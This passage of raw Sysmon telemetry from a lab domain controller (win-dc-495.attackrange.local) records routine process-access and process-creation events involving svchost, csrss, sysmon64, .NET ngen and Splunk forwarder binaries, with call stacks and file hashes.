STEM32\ntdll.dll+51791 10341000x80000000000000005378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.002{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90C7-6005-3D01-00000000A301}5112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.002{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90C7-6005-3D01-00000000A301}5112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.002{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90C7-6005-3D01-00000000A301}5112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90CC-6005-3F01-00000000A301}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90CC-6005-3F01-00000000A301}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90CC-6005-3F01-00000000A301}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.690{59A5CD1D-90CC-6005-3F01-00000000A301}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.783{59A5CD1D-90CD-6005-4001-00000000A301}30524880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90CD-6005-4001-00000000A301}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERN